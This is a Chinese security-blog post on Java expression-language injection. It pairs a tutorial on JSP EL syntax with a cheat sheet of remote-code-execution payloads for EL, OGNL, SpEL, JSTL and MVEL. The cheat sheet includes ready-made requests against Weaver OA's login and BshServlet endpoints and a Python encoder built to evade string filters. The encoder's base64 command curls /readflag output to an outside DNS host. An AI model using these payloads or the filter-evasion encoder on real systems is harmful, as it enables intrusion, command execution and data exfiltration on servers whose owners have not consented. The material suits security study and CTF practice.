

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/douni.jpg">
  <link rel="icon" href="/img/douni.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="主要功能EL表达式主要功能如下  [!NOTE]获取数据:EL表达式主要用于替换JSP页面中的脚本表达式, 以从各种类型的Web域中检索Java对象、获取数据(某个Web域中的对象, 访问JavaBean的属性、访问List集合、访问Map集合、访问数组). 执行运算: 利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算, 以在JSP页面中完成一些简单的逻辑运算, 例如$&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="EL表达式注入">
<meta property="og:url" content="http://example.com/2024/02/18/EL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="fault&#96;s blog">
<meta property="og:description" content="主要功能EL表达式主要功能如下  [!NOTE]获取数据:EL表达式主要用于替换JSP页面中的脚本表达式, 以从各种类型的Web域中检索Java对象、获取数据(某个Web域中的对象, 访问JavaBean的属性、访问List集合、访问Map集合、访问数组). 执行运算: 利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算, 以在JSP页面中完成一些简单的逻辑运算, 例如$&amp;">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-02-18T05:00:00.000Z">
<meta property="article:modified_time" content="2024-03-21T05:06:06.301Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Java各种注入">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>EL表达式注入 - fault`s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/dandan/iconfont.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>fault`s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="EL表达式注入"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-02-18 13:00" pubdate>
          2024年2月18日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          17 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">EL表达式注入</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="主要功能"><a href="#主要功能" class="headerlink" title="主要功能"></a>主要功能</h2><p>EL表达式主要功能如下</p>
<blockquote>
<p>[!NOTE]<br>获取数据:<code>EL</code>表达式主要用于替换<code>JSP</code>页面中的脚本表达式, 以从各种类型的<code>Web</code>域中检索<code>Java</code>对象、获取数据(某个<code>Web</code>域中的对象, 访问<code>JavaBean</code>的属性、访问<code>List</code>集合、访问<code>Map</code>集合、访问数组).</p>
<p>执行运算: 利用<code>EL</code>表达式可以在<code>JSP</code>页面中执行一些基本的关系运算、逻辑运算和算术运算, 以在<code>JSP</code>页面中完成一些简单的逻辑运算, 例如<code>$&#123;user==null&#125;</code>.</p>
<p>获取<code>Web</code>开发常用对象:<code>EL</code>表达式定义了一些隐式对象, 利用这些隐式对象,<code>Web</code>开发人员可以很轻松获得对<code>Web</code>常用对象的引用, 从而获得这些对象中的数据.</p>
<p>调用<code>Java</code>方法:<code>EL</code>表达式允许用户开发自定义<code>EL</code>函数, 以在<code>JSP</code>页面中通过<code>EL</code>表达式调用<code>Java</code>类的方法.</p>
</blockquote>
<h2 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h2><p>可得到<code>PageContext</code>属性值.</p>
<blockquote>
<p>[!NOTE]<br>可直接访问<code>JSP</code>的内置对象, 如<code>page</code>,<code>request</code>,<code>session</code>,<code>application</code>等.</p>
<p>运算符丰富, 有关系运算符、逻辑运算符、算术运算符等.</p>
<p>扩展函数可与<code>JAVA</code>类的静态方法对应.</p>
</blockquote>
<h2 id="基本语法"><a href="#基本语法" class="headerlink" title="基本语法"></a>基本语法</h2><p>所有EL表达式的格式都是以${}表示,例如 ${userinfo}代表获取变量userinfo的值.当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request,session,application范围查找,也可以用范围作为前缀表示属于哪个范围的变量,例如 ${pageScope.userinfo}表示访问page范围中的userinfo变量</p>
<h3 id="与-运算符"><a href="#与-运算符" class="headerlink" title="[]与.运算符"></a>[]与.运算符</h3><p>当要存取的属性名称中包含一些特殊字符,如.或-等非字母或数字的符号,就一定要使用[],例如${user.My-Name}就要改为 <code> $&#123;user[&quot;myname&quot;]&#125;</code></p>
<p>如果要动态取值时, 就可以用<code>[]</code>来做, 而<code>.</code>无法做到动态取值, 例如:<code>$&#123;sessionScope.user[data]&#125;</code>中<code>data</code>是一个变量.</p>
<h3 id="变量"><a href="#变量" class="headerlink" title="变量"></a>变量</h3><p><code>EL</code>表达式存取变量数据的方法很简单, 例如:<code>$&#123;username&#125;</code>. 它的意思是取出某一范围中名称为<code>username</code>的变量. 因为我们并没有指定哪一个范围的<code>username</code>, 所以它会依序从<code>Page</code>、<code>Request</code>、<code>Session</code>、<code>Application</code>范围查找. 假如途中找到<code>username</code>, 就直接回传, 不再继续找下去, 但是假如全部的范围都没有找到时, 就回传<code>&quot;&quot;</code>.</p>
<h3 id="操作符"><a href="#操作符" class="headerlink" title="操作符"></a>操作符</h3><p><code>JSP</code>表达式语言提供以下操作符, 其中大部分是<code>Java</code>中常用的操作符:</p>
<table>
<thead>
<tr>
<th align="center">术语</th>
<th align="center">定义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">算术型</td>
<td align="center"><code>+</code>、<code>-</code>(二元)、<code>*</code>、<code>/</code>、<code>div</code>、<code>%</code>、<code>mod</code>、<code>-</code>(一元).</td>
</tr>
<tr>
<td align="center">逻辑型</td>
<td align="center"><code>and</code>、<code>&amp;&amp;</code>、<code>or</code>、&#96;</td>
</tr>
<tr>
<td align="center">关系型</td>
<td align="center"><code>==</code>、<code>eq</code>、<code>!=</code>、<code>ne</code>、<code>&lt;</code>、<code>lt</code>、<code>&gt;</code>、<code>gt</code>、<code>&lt;=</code>、<code>le</code>、<code>&gt;=</code>、<code>ge</code>. 可以与其他值进行比较, 或与布尔型、字符串型、整型或浮点型文字进行比较.</td>
</tr>
<tr>
<td align="center">空</td>
<td align="center"><code>empty</code>空操作符是前缀操作, 可用于确定值是否为空.</td>
</tr>
<tr>
<td align="center">条件型</td>
<td align="center"><code>A ? B : C</code>. 根据<code>A</code>赋值的结果来赋值<code>B</code>或<code>C</code>.</td>
</tr>
</tbody></table>
<h3 id="隐式对象"><a href="#隐式对象" class="headerlink" title="隐式对象"></a>隐式对象</h3><p><code>JSP</code>表达式语言定义了一组隐式对象, 其中许多对象在<code>JSP Scriplet</code>和表达式中可用:</p>
<table>
<thead>
<tr>
<th align="center">术语</th>
<th align="center">定义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">pageContext</td>
<td align="center"><code>JSP</code>页的上下文, 可以用于访问<code>JSP</code>隐式对象, 如请求、响应、会话、输出、<code>servletContext</code>等. 例如,<code>$&#123;pageContext.response&#125;</code>为页面的响应对象赋值.</td>
</tr>
</tbody></table>
<p>此外, 还提供几个隐式对象, 允许对以下对象进行简易访问:</p>
<table>
<thead>
<tr>
<th align="center">术语</th>
<th align="center">定义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">param</td>
<td align="center">将请求参数名称映射到单个字符串参数值(通过调用<code>ServletRequest.getParameter(String name)</code>获得).<code>getParameter(String)</code>方法返回带有特定名称的参数. 表达式<code>$&#123;param.name&#125;</code>相当于<code>request.getParameter(name)</code>.</td>
</tr>
<tr>
<td align="center">paramValues</td>
<td align="center">将请求参数名称映射到一个数值数组(通过调用<code>ServletRequest.getParameter(String name)</code>获得). 它与<code>param</code>隐式对象非常类似, 但它检索一个字符串数组而不是单个值. 表达式<code>$&#123;paramvalues.name&#125;</code>相当于<code>request.getParamterValues(name)</code>.</td>
</tr>
<tr>
<td align="center">header</td>
<td align="center">将请求头名称映射到单个字符串头值(通过调用<code>ServletRequest.getHeader(String name)</code>获得). 表达式<code>$&#123;header.name&#125;</code>相当于<code>request.getHeader(name)</code>.</td>
</tr>
<tr>
<td align="center">headerValues</td>
<td align="center">将请求头名称映射到一个数值数组(通过调用<code>ServletRequest.getHeaders(String)</code>获得). 它与头隐式对象非常类似, 表达式<code>$&#123;headerValues.name&#125;</code>相当于<code>request.getHeaderValues(name)</code>.</td>
</tr>
<tr>
<td align="center">cookie</td>
<td align="center">将<code>cookie</code>名称映射到单个<code>cookie</code>对象. 向服务器发出的客户端请求可以获得一个或多个<code>cookie</code>. 表达式<code>$&#123;cookie.name.value&#125;</code>返回带有特定名称的第一个<code>cookie</code>值. 如果请求包含多个同名的<code>cookie</code>, 则应该使用<code>$&#123;headerValues.name&#125;</code>表达式.</td>
</tr>
<tr>
<td align="center">initParam</td>
<td align="center">将上下文初始化参数名称映射到单个值(通过调用<code>ServletContext.getInitparameter(String name)</code>获得).</td>
</tr>
</tbody></table>
<p>除了上述两种类型的隐式对象之外, 还有些对象允许访问多种范围的变量, 如<code>Web 上下文</code>、<code>会话</code>、<code>请求</code>、<code>页面</code>:</p>
<table>
<thead>
<tr>
<th align="center">术语</th>
<th align="center">定义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">pageScope</td>
<td align="center">将页面范围的变量名称映射到其值. 例如,<code>EL</code>表达式可以使用<code>$&#123;pageScope.objectName&#125;</code>访问一个<code>JSP</code>中页面范围的对象, 还可以使用<code>$&#123;pageScope.objectName.attributeName&#125;</code>访问对象的属性.</td>
</tr>
<tr>
<td align="center">requestScope</td>
<td align="center">将请求范围的变量名称映射到其值, 该对象允许访问请求对象的属性. 例如,<code>EL</code>表达式可以使用<code>$&#123;requestScope.objectName&#125;</code>访问一个<code>JSP</code>请求范围的对象, 还可以使用<code>$&#123;requestScope.objectName.attributeName&#125;</code>访问对象的属性.</td>
</tr>
<tr>
<td align="center">sessionScope</td>
<td align="center">将会话范围的变量名称映射到其值, 该对象允许访问会话对象的属性. 例如,<code>$&#123;sessionScope.name&#125;</code>.</td>
</tr>
<tr>
<td align="center">applicationScope</td>
<td align="center">将应用程序范围的变量名称映射到其值, 该隐式对象允许访问应用程序范围的对象.</td>
</tr>
</tbody></table>
<h3 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">$&#123;ns:func(param1, param2, ...)&#125;<br></code></pre></td></tr></table></figure>

<p>用el表达式调用函数必须使用<code>taglib</code>引入你的标签库</p>
<h3 id="调用Java方法"><a href="#调用Java方法" class="headerlink" title="调用Java方法"></a>调用Java方法</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs java">&lt;%@ page contentType=<span class="hljs-string">&quot;text/html;charset=UTF-8&quot;</span> language=<span class="hljs-string">&quot;java&quot;</span> %&gt;<br>&lt;%<span class="hljs-meta">@taglib</span> prefix=<span class="hljs-string">&quot;elFunc&quot;</span> uri=<span class="hljs-string">&quot;http://www.test.com/elFunc&quot;</span> %&gt;<br>&lt;%<br>    <span class="hljs-type">String</span> <span class="hljs-variable">name</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;张三&quot;</span>;<br>    request.setAttribute(<span class="hljs-string">&quot;name&quot;</span>,name);<br>%&gt;<br>调用函数：$&#123;elFunc:elFunc(name)&#125;<br></code></pre></td></tr></table></figure>

<h2 id="表达式注入实例"><a href="#表达式注入实例" class="headerlink" title="表达式注入实例"></a>表达式注入实例</h2><h3 id="通用POC"><a href="#通用POC" class="headerlink" title="通用POC"></a>通用POC</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java">$&#123;pageContext&#125;<br>$&#123;pageContext.getSession().getServletContext().getClassLoader().getResource(<span class="hljs-string">&quot;&quot;</span>)&#125;<br>$&#123;header&#125;<br>$&#123;applicationScope&#125;<br>$&#123;pageContext.setAttribute(<span class="hljs-string">&quot;a&quot;</span>,<span class="hljs-string">&quot;&quot;</span>.getClass().forName(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>).getMethod(<span class="hljs-string">&quot;exec&quot;</span>,<span class="hljs-string">&quot;&quot;</span>.getClass()).invoke(<span class="hljs-string">&quot;&quot;</span>.getClass().forName(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>).getMethod(<span class="hljs-string">&quot;getRuntime&quot;</span>).invoke(<span class="hljs-literal">null</span>),<span class="hljs-string">&quot;calc.exe&quot;</span>))&#125;<br></code></pre></td></tr></table></figure>

<h3 id="Struts2-OGNL"><a href="#Struts2-OGNL" class="headerlink" title="Struts2 OGNL"></a>Struts2 OGNL</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java">@[类全名（包括包路径）]@[方法名 |  值名]，例如：<br><span class="hljs-meta">@java</span>.lang.String<span class="hljs-meta">@format(&#x27;foo %s&#x27;, &#x27;bar&#x27;)</span><br></code></pre></td></tr></table></figure>
<p>实例代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">ActionContext</span> <span class="hljs-variable">AC</span> <span class="hljs-operator">=</span> ActionContext.getContext();<br><span class="hljs-type">String</span> <span class="hljs-variable">expression</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;$&#123;(new java.lang.ProcessBuilder(&#x27;calc&#x27;)).start()&#125;&quot;</span>;<br>AC.getValueStack().findValue(expression));<br><br></code></pre></td></tr></table></figure>

<h3 id="Spring-SPEL"><a href="#Spring-SPEL" class="headerlink" title="Spring SPEL"></a>Spring SPEL</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">String</span> <span class="hljs-variable">expression</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;T(java.lang.Runtime).getRuntime().exec(/&quot;</span>calc/<span class="hljs-string">&quot;)&quot;</span>;<br><span class="hljs-type">String</span> <span class="hljs-variable">result</span> <span class="hljs-operator">=</span> parser.parseExpression(expression).getValue().toString();<br></code></pre></td></tr></table></figure>

<h3 id="JSP-JSTL-EL"><a href="#JSP-JSTL-EL" class="headerlink" title="JSP JSTL_EL"></a>JSP JSTL_EL</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java">&lt;spring:message text=<span class="hljs-string">&quot;$&#123;/&quot;</span>/<span class="hljs-string">&quot;.getClass().forName(/&quot;</span>java.lang.Runtime/<span class="hljs-string">&quot;).getMethod(/&quot;</span>getRuntime/<span class="hljs-string">&quot;,null).invoke(null,null).exec(/&quot;</span>calc/<span class="hljs-string">&quot;,null).toString()&#125;&quot;</span>&gt;<br>&lt;/spring:message&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Elasticsearch-MVEL"><a href="#Elasticsearch-MVEL" class="headerlink" title="Elasticsearch MVEL"></a>Elasticsearch MVEL</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">String</span> <span class="hljs-variable">expression</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;new java.lang.ProcessBuilder(/&quot;</span>calc/<span class="hljs-string">&quot;).start();&quot;</span>;  <br><span class="hljs-type">Boolean</span> <span class="hljs-variable">result</span> <span class="hljs-operator">=</span> (Boolean) MVEL.eval(expression, vars);<br></code></pre></td></tr></table></figure>

<h3 id="泛微OA-EL表达式注入"><a href="#泛微OA-EL表达式注入" class="headerlink" title="泛微OA EL表达式注入"></a>泛微OA EL表达式注入</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">login.<span class="hljs-keyword">do</span>?message=<span class="hljs-meta">@org</span>.apache.commons.io.IOUtils<span class="hljs-meta">@toString(@java.lang.Runtime@getRuntime().exec(&#x27;whoami&#x27;).getInputStream())</span><br></code></pre></td></tr></table></figure>
<p>或者POST</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">message=(#_memberAccess=<span class="hljs-meta">@ognl</span>.OgnlContext<span class="hljs-meta">@DEFAULT_MEMBER_ACCESS</span>).(#w=#context.get(<span class="hljs-string">&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;</span>).getWriter()).(#w.print(<span class="hljs-meta">@org</span>.apache.commons.io.IOUtils<span class="hljs-meta">@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream())</span>)).(#w.close())&amp;cmd=whoami<br></code></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">POST /weaver/bsh.servlet.BshServlet<br>bsh.script=eval%00(&quot;ex&quot;%2b&quot;ec(\\&quot;cmd+/c+calc\\&quot;)&quot;);&amp;bsh.servlet.captureOutErr=true&amp;bsh.servlet.output=raw<br></code></pre></td></tr></table></figure>

<h3 id="字符串拼接绕过对字符串的检测"><a href="#字符串拼接绕过对字符串的检测" class="headerlink" title="字符串拼接绕过对字符串的检测"></a>字符串拼接绕过对字符串的检测</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs python"><br>Author: fault<br><br>Date: <span class="hljs-number">2024</span>-02-<span class="hljs-number">19</span> 01:<span class="hljs-number">14</span>:<span class="hljs-number">47</span><br><br>LastEditors: fault<br><br>LastEditTime: <span class="hljs-number">2024</span>-02-<span class="hljs-number">19</span> 01:<span class="hljs-number">45</span>:09<br><br>Description: wish_my_code_not_fault<br><br>version: <span class="hljs-number">1.0</span><br><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string"></span><br><span class="hljs-string">def encode(payload):</span><br><span class="hljs-string"></span><br><span class="hljs-string">    encode_payload = &quot;&quot;</span><br><span class="hljs-string"></span><br><span class="hljs-string">    for i in range(0, len(payload)):</span><br><span class="hljs-string"></span><br><span class="hljs-string">        if i == 0:</span><br><span class="hljs-string"></span><br><span class="hljs-string">            encode_payload += &quot;true.toString().charAt(0).toChars(%d)[0].toString()&quot; % ord(payload[0])</span><br><span class="hljs-string"></span><br><span class="hljs-string">        else:</span><br><span class="hljs-string"></span><br><span class="hljs-string">            encode_payload += &quot;.concat(true.toString().charAt(0).toChars(%d)[0].toString())&quot; % ord(payload[i])</span><br><span class="hljs-string"></span><br><span class="hljs-string">    return encode_payload</span><br><span class="hljs-string"></span><br><span class="hljs-string">  </span><br><span class="hljs-string"></span><br><span class="hljs-string">#$&#123;pageContext.setAttribute(%s,&quot;&quot;.getClass().forName(%s).getMethod(%s,&quot;&quot;.getClass()).invoke(&quot;&quot;.getClass().forName(%s).getMethod(%s).invoke(null),%s))&#125;</span><br><span class="hljs-string"></span><br><span class="hljs-string">  </span><br><span class="hljs-string"></span><br><span class="hljs-string">exp = &#x27;$&#123;&quot;&quot;.getClass().forName(&quot;javax.script.ScriptEngineManager&quot;).newInstance().getEngineByName(&quot;JavaScript&quot;).eval(%s)&#125;&#x27; % (encode(&#x27;java.lang.Runtime.getRuntime().exec(&quot;bash -c &#123;echo,Y3VybCBgL3JlYWRmbGFnYC5hZTc3MzUxMjgyLmlwdjYuMTQzMy5ldS5vcmc=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;)&#x27;))</span><br><span class="hljs-string"></span><br><span class="hljs-string">  </span><br><span class="hljs-string"></span><br><span class="hljs-string">print(exp)</span><br></code></pre></td></tr></table></figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Java%E5%90%84%E7%A7%8D%E6%B3%A8%E5%85%A5/" class="print-no-link">#Java各种注入</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>EL表达式注入</div>
      <div>http://example.com/2024/02/18/EL表达式注入/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年2月18日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/21/hello-world/" title="Hello World">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


